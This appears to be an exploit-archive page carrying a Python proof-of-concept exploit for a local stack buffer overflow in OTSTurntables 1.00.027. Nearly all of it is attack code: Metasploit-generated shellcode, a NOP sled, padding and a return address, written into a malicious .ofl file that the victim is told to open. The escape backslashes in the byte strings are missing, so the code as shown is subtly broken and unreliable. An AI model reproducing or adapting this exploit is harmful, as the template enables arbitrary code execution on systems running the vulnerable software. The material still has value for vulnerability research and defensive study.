[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit
# Published : 2009-01-14
# Author : suN8Hclf
# Previous Title : Total Video Player 1.31 (DefaultSkin.ini) Local Stack Overflow Exploit
# Next Title : VUPlayer 2.49 .ASX File (Universal) Local Buffer Overflow Exploit
# OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit
# Discovered & exploited bY suN8Hclf
# crimson.loyd@gmail.com, blacksideofthesun.linuxsecured.net
# Tested on: Windows XP SP2 Polish Full patched
#
# Only 274 bytes for shellcode. Wanna more, exploit SEH !!!
#
# Thanks to Myo and to everyone who knows what hacking really is
# Not for money dude, only for fun !!!
print "====================================================================="
print " OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit"
print " bY suN8Hclf (crimson.loyd@gmail.com)"
print "====================================================================="
nops = "x90" * 4
ret = "x75x52x46"; # call ebx
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"x29xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xc9"
"x2cxc9x40x83xebxfcxe2xf4x35xc4x8dx40xc9x2cx42x05"
"xf5xa7xb5x45xb1x2dx26xcbx86x34x42x1fxe9x2dx22x09"
"x42x18x42x41x27x1dx09xd9x65xa8x09x34xcexedx03x4d"
"xc8xeex22xb4xf2x78xedx44xbcxc9x42x1fxedx2dx22x26"
"x42x20x82xcbx96x30xc8xabx42x30x42x41x22xa5x95x64"
"xcdxefxf8x80xadxa7x89x70x4cxecxb1x4cx42x6cxc5xcb"
"xb9x30x64xcbxa1x24x22x49x42xacx79x40xc9x2cx42x28"
"xf5x73xf8xb6xa9x7ax40xb8x4axecxb2x10xa1xdcx43x44"
"x96x44x51xbex43x22x9exbfx2ex4fxa8x2cxaax02xacx38"
"xacx2cxc9x40"
)
num = 276 - 4 - 160
buff = "x41" * num
exploit = nops + shellcode + buff + ret
try:
out_file = open("open_me.ofl",'w')
out_file.write(exploit)
out_file.close()
raw_input("nNow open open_me.ofl file to exploit bug!n")
except:
print "WTF?"
# www.Syue.com [2009-01-14]